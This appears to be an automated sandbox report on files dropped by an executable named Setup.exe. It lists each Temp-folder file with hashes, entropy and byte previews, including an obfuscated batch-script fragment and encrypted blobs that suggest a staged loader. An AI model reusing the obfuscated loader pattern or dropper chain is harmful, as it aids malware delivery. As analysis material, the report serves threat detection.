                                                                                                                                                                      SSDEEP:1536:grfjVQJTaqw1U6D6ZJoYliEvfstVc5/88wb0320DNStFeRBkj:Gj+Lw1X6ZqY/vfstVu/Ipe2
                                                                                                                                                                      MD5:2A80ED063A2EC6F7FBDBAA0C8806BEE5
                                                                                                                                                                      SHA1:7235E6A68488D9583FFB7BFEFD146FD4B47E074E
                                                                                                                                                                      SHA-256:EF6F02A7FBA84C6FD4C7F3AA77141B4EBE36D7A0B89AA89B82E3689D3C4342D7
                                                                                                                                                                      SHA-512:F3D245B534ACC86C0F13CF8C8A88AAA45CCD72EB959A9B710690F3F851327DF10A1F4045618886F10D8014BDF4B7E03EA5788A3F29EA237A35BDCE49AEE1F862
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..7..Y..........h.|.K.....:.......Mo..O.U..ru..........I$..@.).......cMc)C....r..K.....^...\......Hh...f<...pr.{Q.~...ym..l......L^x.M. ..P..A.........V...._...e.B.<F..........N......omiq ..[........q. .B.U=m...?...paB..qi?f....[......wn...Z..db...5....gy..>@...c+.v..o.(......m*......>.....0\....A..(&...2.?.1....n...Pp...O.C.n*...7.<...Y).....rn.S...]|.(n.F.U.0<.).q.h.8.a....w.".v......D..`..|.(8_..S5.U..........-.Z...L.f.Ns.......?......].p..B.p.>}AWDR.Exw....T......3...Y<.T....K......d.?.......`<sI4...gi..PN.?2&...H.._fh..H....o.H..4>.$.<.Zjw.."\..%..I..H.N....s<j.....Fp..e.#Vj....&..m,.}.?....xr.H.........`.i.1Jj..8..~.I..?u)1..&..k.% .I.=..x...V..! ......ULf.W....db#v.m../ldz-..:...L....0......E.P.}f..........p...}.L..z.?B4{Rz.d...V...0..=..<..TH..>...F.Q}.........q....~:..N..l.t...Q..,..e..I|}..."]iP..{.W...84...o.........P.G`...y...;t....T.L(K..*...@.(..H\....`..Ga.6{1K..h.qT]F".*.....o....>...D.}...mUi4={....\..|....Pn'.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Clicks

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (980), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):21933
                                                                                                                                                                      Entropy (8bit):5.098733008811691
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:hXaKFDtP0hMjSwgunj4RBQtvcy7KxRVIjGBnV2gR9XnNNCUZ0n+RL1ddXJtNiLYi:hXaUchMGKnyBQVBujIG9AgJjFHb+
                                                                                                                                                                      MD5:B72A397CD97E0F26EA645687E0E27B12
                                                                                                                                                                      SHA1:8BA44F76D5CDD59429FAE20D9386E1F62785AFBA
                                                                                                                                                                      SHA-256:5D3E41E290DC98B449E186D0A3E9EC9E02863DE087EC95B3684C399C7D4DB280
                                                                                                                                                                      SHA-512:938FD796A5F4109B2678CE8B7AB93330317A71AA1E69CF81DE1C759A659D8B0E080B94BFA2F9FEA24224E19DDC53C3C1BB3F7CCD9ED8C5323638BD29E1EDC074
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Set Accessed=a..jDSDDaughters-Sc-Equipped-Stewart-..rXRestoration-Counties-Secured-Lucia-..iFTeddy-..lESuccessfully-Jordan-Justin-Clouds-..xYwSt-Moscow-Ou-..TdDiversity-Bookstore-Aid-Reasoning-Broadway-Consequences-Commissioners-..Set Momentum=2..XItBike-Subsidiaries-..KgcXAccessory-Scored-Message-Nuke-Guess-Figure-Necessarily-..NLlMight-Untitled-Mail-Programs-Charles-Tea-Myself-..rZActually-..DUeKYouth-Ieee-..vrAaInternationally-Temporal-Enjoy-Tiny-..kndFExpiration-Broadcasting-..xQSAcre-Recordings-Maternity-Switched-Soldiers-Injuries-Meets-..Set Doing=Z..wWCome-Strip-To-Clay-Rank-Mood-Licking-Dress-..jwQRequires-Genius-Studying-..ZZMATax-Solely-James-Putting-Hear-Irrigation-Strain-Collectible-..jDZones-Verizon-Costa-Valuable-Midlands-Calculations-..YDTechnical-Prophet-Involve-Recovered-Surveillance-Euro-Pix-..wlFears-Weekly-Barbados-..qoevCoin-Screensavers-Detailed-..NvHZSurveys-Keith-Louis-Disturbed-..Set Customize=I..FqFpCeremony-Brands-Conservative-Municipal-Ace-..tDUDuties-Papua-

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Clicks.cmd (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (980), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):21933
                                                                                                                                                                      Entropy (8bit):5.098733008811691
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:hXaKFDtP0hMjSwgunj4RBQtvcy7KxRVIjGBnV2gR9XnNNCUZ0n+RL1ddXJtNiLYi:hXaUchMGKnyBQVBujIG9AgJjFHb+
                                                                                                                                                                      MD5:B72A397CD97E0F26EA645687E0E27B12
                                                                                                                                                                      SHA1:8BA44F76D5CDD59429FAE20D9386E1F62785AFBA
                                                                                                                                                                      SHA-256:5D3E41E290DC98B449E186D0A3E9EC9E02863DE087EC95B3684C399C7D4DB280
                                                                                                                                                                      SHA-512:938FD796A5F4109B2678CE8B7AB93330317A71AA1E69CF81DE1C759A659D8B0E080B94BFA2F9FEA24224E19DDC53C3C1BB3F7CCD9ED8C5323638BD29E1EDC074
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Set Accessed=a..jDSDDaughters-Sc-Equipped-Stewart-..rXRestoration-Counties-Secured-Lucia-..iFTeddy-..lESuccessfully-Jordan-Justin-Clouds-..xYwSt-Moscow-Ou-..TdDiversity-Bookstore-Aid-Reasoning-Broadway-Consequences-Commissioners-..Set Momentum=2..XItBike-Subsidiaries-..KgcXAccessory-Scored-Message-Nuke-Guess-Figure-Necessarily-..NLlMight-Untitled-Mail-Programs-Charles-Tea-Myself-..rZActually-..DUeKYouth-Ieee-..vrAaInternationally-Temporal-Enjoy-Tiny-..kndFExpiration-Broadcasting-..xQSAcre-Recordings-Maternity-Switched-Soldiers-Injuries-Meets-..Set Doing=Z..wWCome-Strip-To-Clay-Rank-Mood-Licking-Dress-..jwQRequires-Genius-Studying-..ZZMATax-Solely-James-Putting-Hear-Irrigation-Strain-Collectible-..jDZones-Verizon-Costa-Valuable-Midlands-Calculations-..YDTechnical-Prophet-Involve-Recovered-Surveillance-Euro-Pix-..wlFears-Weekly-Barbados-..qoevCoin-Screensavers-Detailed-..NvHZSurveys-Keith-Louis-Disturbed-..Set Customize=I..FqFpCeremony-Brands-Conservative-Municipal-Ace-..tDUDuties-Papua-

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Cookies

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):115712
                                                                                                                                                                      Entropy (8bit):6.395119066715225
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:0kjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgh:0kjGgQaE/loUDtf0accB30
                                                                                                                                                                      MD5:C4852541FFA550317E284995D601BE19
                                                                                                                                                                      SHA1:295EE4490A566D441DEAB2DBBB7917E36C154984
                                                                                                                                                                      SHA-256:D31EEED38AC69015A7ACB915312B6FAEF3534641C61926F9CD4E5471C8921501
                                                                                                                                                                      SHA-512:4EF2060810F8A9886CFCACAC246CBFC5408B46C3E07460B7D27271F52E09ABFFB1304A00B57C85F17F3C1B980E8944272CE2AD0B7902B23949C8D68CBE94B8EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.w..3.........+%E...@...@..$E...@..%E.@%E.[%E..%E..%E.p%E.....U...4SV...E.....W.u..E.......m......d.....h....E......E...'>...{,..{..}....>...C......;>........>...O......'?...K,.....&@.....C ....U...E....U.M..E..E...;E....?..;....?...E...O......@...M.......K .U..E......Q.........$K.......?........@.............sC...K.......G.....#K................A...C..E..G.......B....9E.|).K..E.A...M....BC...E.....HC.._^[..].....m.......B....l....uv..h...._0..t..O ......O......j8W.X........h...2...m.....d...........w....$.<.@..K..B....]....8....].....A..P....t........*E...@..)E...@...@.>*E...@._.@.....U...TS.]..E.VWj.P.E..E.....P...E.....S.u..E......E..............D...M.U..U....ua..up2..E..E..E....~E............S..}....f.x.....G...8....G...D..G..@...f.....B....}..u _^[..]....A....w..$.0.@...t....3..E...I.3..E......M.u.f...tz..$..........x.;...X...j........K........f.N.f.K.f.N.f..?......f.....tE..f.. ..yE.......M.E.4..E..M.u.A.M.P....f.x..u..<.;...PE..j..v.....O.......f.N.f.O.f.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Developers

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):119808
                                                                                                                                                                      Entropy (8bit):4.703941535706935
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:8x/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3B:8dKaj6iTcPAsAhxjgarB/5el3B
                                                                                                                                                                      MD5:6AD6CD8E77D34C3079924FD65546554F
                                                                                                                                                                      SHA1:2E18F066D291DAF1FC92E65FCDA539082C96706B
                                                                                                                                                                      SHA-256:C4DE2122AAC5865C856E71D4ECD8C2D96A9CDD0D1C277AC4585193F7A836CF86
                                                                                                                                                                      SHA-512:A5E22E29C4B84F3E79CEB2B572E45266EC5CBCE440CEDE118508447B1B1EB74394BB90A1C8C8D27B587B1440CFBDB2F9319B375C63B90615450E282C13EA5F3F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.r.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.r.>.>.>.?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.r.r.r.r.r.r.r.r.r.r.r.C.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Digital

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):84992
                                                                                                                                                                      Entropy (8bit):7.998038120662092
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:sIA4cY4ZTD4Wdyt1SLu68D95GjAPjKocYPsj+R+VUBZfyzusHLyJ83wC8niH:/Zt4Okyt0YDrjJBPsaQaYLzt8niH
                                                                                                                                                                      MD5:20939DE37758844D50817F401E778A6E
                                                                                                                                                                      SHA1:57B1ADB6D7EFE4656D336C370B9A6836AD240047
                                                                                                                                                                      SHA-256:3767D43C25C3E65CC5181C73875F1506A68AC2CBE4F0332E0C471C4A3842FF2B
                                                                                                                                                                      SHA-512:9B3DB71D43B7C77C24C6AB59D205B18C9DA57105A9825F77C2865CE2F4A0EA92C1837B27A5D4AD6315BA92BA0FF995FA2BEB2ACDD4CD0A9B85C68EE362405F4D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:n..$.,.V_x...1d.........4.t.,.b.<.....F.3"...Q@.5.d......$..5.|...+..g....(..(.].7K..{)].Y'@..p..,E[..:"\T..L...u9.....X5..t....@..F......._.A]=GZ...F!.....Rc\.c.o.h.........<x.b_S=.e5..+EZ#....m...'S.d.......K.8Q..W..;..........",.....z..w....p..$0..C.....RHu.T..L....~.a..dZ.dW.>}....5....]m\G.....k%n.=.k....;W[E....h}Z.<..,....H.?"~iD.O...?.<_m.N~..=o. '......H<.vv...e.|=E.....'i?a....e.I.t...pg.Q3.......4.....^6^h\.`.v........9......Tf..=K..iR..'.I$]N.....p.Y...;R...C^..r).@..ai:~..9JP.......F.c3..|.R%......Wo.Z....N.Y..:...L..X6@........N9...#..n.B.X....Y.....~.S... ..45.TL...?..."..n'..v.5.......T.*..Sl....._4..r,.C.....8..>4...m.......{...C.....i...8.Pi+8.A.\gQ:..'I.....B*.q....oL_r{....|....F7f.`.i&u.9......^zL..Y..)..9..>..P..Z01.............%.....J.{.Q..[.~R..xyK.({.m;..[.Dv..wE.;....3.<..5..+...qkN..p?...e...F.x..42^%$......R7W...>B.....S.z>..JL..p=-B.e.v..Ph.v.2zG....jb.5m.T..Os.....>q...........#..m....Q..T.c.+....2..c...q....>..8.}^

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Flat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):81920
                                                                                                                                                                      Entropy (8bit):7.9975318296902085
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:KQJudkxXNhePo/DCiyl7QMkDKLdS5omcsuXq5oPj2TtfGXQ1Yn:TJIklbePIDVI76KLdS5oJr2T9WQ1M
                                                                                                                                                                      MD5:4AB70FFED39BD5AC69154E19D58B0267
                                                                                                                                                                      SHA1:4222C1A9BA794033A285027DB648950B3ED5BB42
                                                                                                                                                                      SHA-256:37BAA43A816D6A60D68ABD4DEEDF84C6F3EE08FFC0BE271C9865A0CA1FF3977D
                                                                                                                                                                      SHA-512:2C596F996C103900F3ABAC713241E61CCB45EC0FDD3342805A8400BC3992EE60A38BB660B6E67DABF57BC2F335DCA6E0D02B333EC2852406780B6FADE1FAF61B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.dK.. .lV(..&...`e.?..)H...tX..-1`.d._E.W...fS..g<..w.%.`m.$..a_v..B.4.Tt.#....g?...Iy......)....).Sg ........t.g.q\....h)....D......./wF).{...F....d.^`..B..N...E.wj,.z0.s..aW..|..P-).3V...:..mC.....7.z$Pn......]......>...\...`.....N...+IS...Q........9+g .J...[...sp,.'.{1.....DnW..3.xS......H.z...z...L*..^.P..E.$.6:.....]I..}:i.........wl..(q....^.7..T.7..Ta...Va......g|..........zu#?.N`.O....anX..".e.....+....j.DyJ-F.a...?.m.....v.d......e...@Yu..Y...9....,.a....U...g......:.^.....\c..M...}....SP.n..A4'6hE.r.;9.>Y......5?..];i...\.6.....U......1....s.$..&../k..@e/..f.....l.,.x.[@<.H[..e.i%.O...Y&.mC...5$T]....p.h/6tfk.p...7.B[.[.......t..j.w...Rt{:&MTs..=t...-..YQ+S.(......:.!....z..C..1.@.p..@.sX.......A...../. ..n......Y.\..c..<..^.5.....K...[..?.D>.V...u....f.../..%......iq...W-,z......:.1.U...K..ro..5^..e..C..x..:.[8.U..$.....L....f.e.....<O?..rq.....4^..$......P....8.}.T.Z)...*2.u.,..J...S.1<....*u..{vp..qw.7.`]...c..h.'..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Fw

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):11606
                                                                                                                                                                      Entropy (8bit):7.4586390538525755
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:/sxvhLuBgfMvSVZPkZeCeAH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:/GhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ38
                                                                                                                                                                      MD5:7A4CC8156B3C6C90F7D85BCD734AFE1F
                                                                                                                                                                      SHA1:60D593ADB9C1CC411A5AFC2B16479B75677162E9
                                                                                                                                                                      SHA-256:2D6B7033E50813D756FFDD4AD36C8DF1017A9A70FC09483E8973B7929BE0DE8E
                                                                                                                                                                      SHA-512:9F4A21993B88F883FA311B545BE8565939CD008045E764F4C2A44EF1883152BCE8C7F3EADCAB530650003C5693268D48D73FA48EF6B63B8CA90F5DE7C143DCDE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:8>@>H>P>X>`>h>p>x>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.? ?(?0?8?@?H?P?X?........$3@3D3.3.3.3. .......0(0.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2.2.2.2.2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3.3.3.3 3$3(3,3034383@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:.:.:.:.: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;.;.;.;.; ;$;(;,;0;4;8;<;@;D;H;L;P;.<.<...@.......3.3.3.3.3.3.4.4.4,4<4@4P4T4X4`4x4.4.4.4.4.4.4.4.4.4.4.4.4.4.5 5$54585<5D5\5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.:.:.:.: :$:0:4:8:<:D:L:\:`:h:l:p:t:|:.:.:.:...`.......=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>.>.>.>.> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>.>.>.>.>.>.>.>.>.>.>.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?...p..x....0.0.0.0.0(0,0004080<0

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Gnome

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):56320
                                                                                                                                                                      Entropy (8bit):7.996391191024259
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:9y+X35Zzw/OxuLxNqF9vtOEmH3fcoQZ/SDfNuz6RgBStp46V:9y+n5KGxuL89vcPZdDIW6BSjd
                                                                                                                                                                      MD5:67EBFD624465856B781C2F15624B5FBB
                                                                                                                                                                      SHA1:6B80BBBDBA9B6F3B587F6C84B81E509761C31C08
                                                                                                                                                                      SHA-256:2EF775B484665CA2D846E398C6C65CDDFDD66E3AC0CF37B5D51780F7A913934B
                                                                                                                                                                      SHA-512:0F392C2B778DB3F688BA0ADF2A37AA91470767A50D7E9A602600B602535B39B1FE02E865404A20363B1753BB55D5718582A69F759950B99A10F111A8795A930A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..igIm...y(y........e...|...'...w.......9b.a....y.7.F...-.J.B....o...NVQ.xb._r#....wU...H>s...r......z......*.....wH...P{..=.o...q....={.....}....9sW<4hOJ.KK..1E.....@$.......%@....q........:X~...^......3<.i9...V....F....;.A[S'I+..... WW.I.R%8...p..yU..!....Uq...D.W.[G..v:...|.3...L.y^.H.v2....y..l..........m.^_...\N/....zy..{g?G...k.......H}f..q9R.I.^C.B....N.<..o.w.^wq\.j..../j...M..u.....9/.g?.R\e..Z..:.'.uI.].d..2.......&.M.. 0.O.{..........K.cT..o...].uz..=a.B@..C.}.T_.6..5+V.d..._.<.'.Ua...,d.......g[.....N.....XQ..O..8 ..6.Ce.4&....@)..3.]..*y.)X).....t...(<q#.w..X.`...wM.N.P.0{U.WnYu+..X....a.{[.....}...i.#PG..g........1..E..(.\`3_n.S2.eT&.........#.X......]`9/...YN.W.8.RH.K."..`..O.c....W@g..U.....!g.D.v?E.)..*.|.J.D..Y>.F.=..(.(".zo....R....<.C..f..E..v...R....`FG5"...x.(..$...[..%..a./.W...4z.?)z.\.TW&..@.[.w.W......94torJ..$....<.c.t.4.e?.v.n.&.....jt2..kr.`..Tn..H.....y......1..?.Y1.6.,T.z.l.D.C./.lC7...A9..e.x...m.Vg...@>jT....8r..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Jury

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):79872
                                                                                                                                                                      Entropy (8bit):6.667903538113778
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:SYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgB:1Wy4ZNoGmROL7F1G7hg
                                                                                                                                                                      MD5:A7DD562FCE7652FB965799C55254A0BA
                                                                                                                                                                      SHA1:CC4D96CC2BA4CE3BA53BAB6E9EAE0FCAD590C9C7
                                                                                                                                                                      SHA-256:0C186D145F698364C95675C82600446E24DC25E2BD7DB0520733C67781EAC0B3
                                                                                                                                                                      SHA-512:FC982815B5F73E5A145C0BD89C22E404A29C510D74714A66D0FF9C2AD1A516D426BD3FF2166A5C1336571827C4CC665311C591F227E2BB9E85FCB1E95F914785
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:a.r.i.a.b.l.e.s. .a.l.l.o.w.e.d. .i.n. .a. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t...v.".l.o.n.g._.p.t.r.".,. .".i.n.t._.p.t.r.". .a.n.d. .".s.h.o.r.t._.p.t.r.". .D.l.l.C.a.l.l.(.). .t.y.p.e.s. .h.a.v.e. .b.e.e.n. .d.e.p.r.e.c.a.t.e.d... . .U.s.e. .".l.o.n.g.*.".,. .".i.n.t.*.". .a.n.d. .".s.h.o.r.t.*.". .i.n.s.t.e.a.d...-.O.b.j.e.c.t. .r.e.f.e.r.e.n.c.e.d. .o.u.t.s.i.d.e. .a. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t...).N.e.s.t.e.d. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t.s. .a.r.e. .n.o.t. .a.l.l.o.w.e.d...".V.a.r.i.a.b.l.e. .m.u.s.t. .b.e. .o.f. .t.y.p.e. .".O.b.j.e.c.t."...1.T.h.e. .r.e.q.u.e.s.t.e.d. .a.c.t.i.o.n. .w.i.t.h. .t.h.i.s. .o.b.j.e.c.t. .h.a.s. .f.a.i.l.e.d...8.V.a.r.i.a.b.l.e. .a.p.p.e.a.r.s. .m.o.r.e. .t.h.a.n. .o.n.c.e. .i.n. .f.u.n.c.t.i.o.n. .d.e.c.l.a.r.a.t.i.o.n...2.R.e.D.i.m. .a.r.r.a.y. .c.a.n. .n.o.t. .b.e. .i.n.i.t.i.a.l.i.z.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r...1.A.n. .a.r.r.a.y. .v.a.r.i.a.b.l.e. .c.a.n. .n.o.t. .b.e. .u.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....C.a.n. .n.o.t. .r.e.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Newbie

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):55296
                                                                                                                                                                      Entropy (8bit):6.548215294045205
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:JQ18OWrM81EyJqx9EdzGGXZVfmlqTmN5WAQIGK2ud5lS87uzh7JCQ/sE7mOB6XSB:m1/AD1EsdzVXnP94SGGLpRB6M20
                                                                                                                                                                      MD5:EF4E81CB8052EE9B5A6FC6DCD7567548
                                                                                                                                                                      SHA1:B919759461FD777C96B4F322F408812009B40C00
                                                                                                                                                                      SHA-256:B02877F89D3F3E8327DB1964DAE27C0E7C5087527BA650066C1BD6C6E4A4F715
                                                                                                                                                                      SHA-512:067B2BB15104B685E243EE08177C94625F55713FAD6D2264088650B889B0208448DC428ACC5EED0056D959686D338396AAF18D23EFD2C7C07203FDBBA1EDCBBC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...............................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...............

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Sail

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset -9444732965739290427392.000000, slope 2734396502252404170448376371133546496.000000
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60416
                                                                                                                                                                      Entropy (8bit):6.067319379992331
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:50vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwun:50vtmgMbFuz08QuklMBNIimuzaAwusq
                                                                                                                                                                      MD5:7E9F33DC7CC9891C8CA419EBC7B31AAA
                                                                                                                                                                      SHA1:DA6037F59597399A96A8E756D819CD0E2E104A4A
                                                                                                                                                                      SHA-256:5C5491AC3971BFA44F13F9719F011A7B1B353BC4127ECF7195A74513345EB7BB
                                                                                                                                                                      SHA-512:8BAD109A56DC7C0B03B0848C962FE60DD878EE9209D2FDE90E1429EF77D3B58E0A03CA795805EBE08CED195AE45AB895BB68AD952BF1ED9595C33AEC0C71E8E5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:u.z.-.e.c.....q.u.z.-.p.e.....r.o.-.r.o...r.u.-.r.u...s.a.-.i.n...s.e.-.f.i...s.e.-.n.o...s.e.-.s.e...s.k.-.s.k...s.l.-.s.i...s.m.a.-.n.o.....s.m.a.-.s.e.....s.m.j.-.n.o.....s.m.j.-.s.e.....s.m.n.-.f.i.....s.m.s.-.f.i.....s.q.-.a.l...s.r.-.b.a.-.c.y.r.l.....s.r.-.b.a.-.l.a.t.n.....s.r.-.s.p.-.c.y.r.l.....s.r.-.s.p.-.l.a.t.n.....s.v.-.f.i...s.v.-.s.e...s.w.-.k.e...s.y.r.-.s.y.....t.a.-.i.n...t.e.-.i.n...t.h.-.t.h...t.n.-.z.a...t.r.-.t.r...t.t.-.r.u...u.k.-.u.a...u.r.-.p.k...u.z.-.u.z.-.c.y.r.l.....u.z.-.u.z.-.l.a.t.n.....v.i.-.v.n...x.h.-.z.a...z.h.-.c.h.s.....z.h.-.c.h.t.....z.h.-.c.n...z.h.-.h.k...z.h.-.m.o...z.h.-.s.g...z.h.-.t.w...z.u.-.z.a...0...1#INF...1#QNAN..1#SNAN..1#IND..............?.......?.......?.....D.?.......?.......?....@..?....@W.?.......?.......?.......?.....w.?.....A.?.......?....@..?.......?.....q.?.....?.?.......?....@..?.......?.....}.?.....N.?....@ .?.......?.......?.......?.....m.?.....A.?.......?.......?.......?.......?.....q.?.....H.?.....!.?.......?.......?..

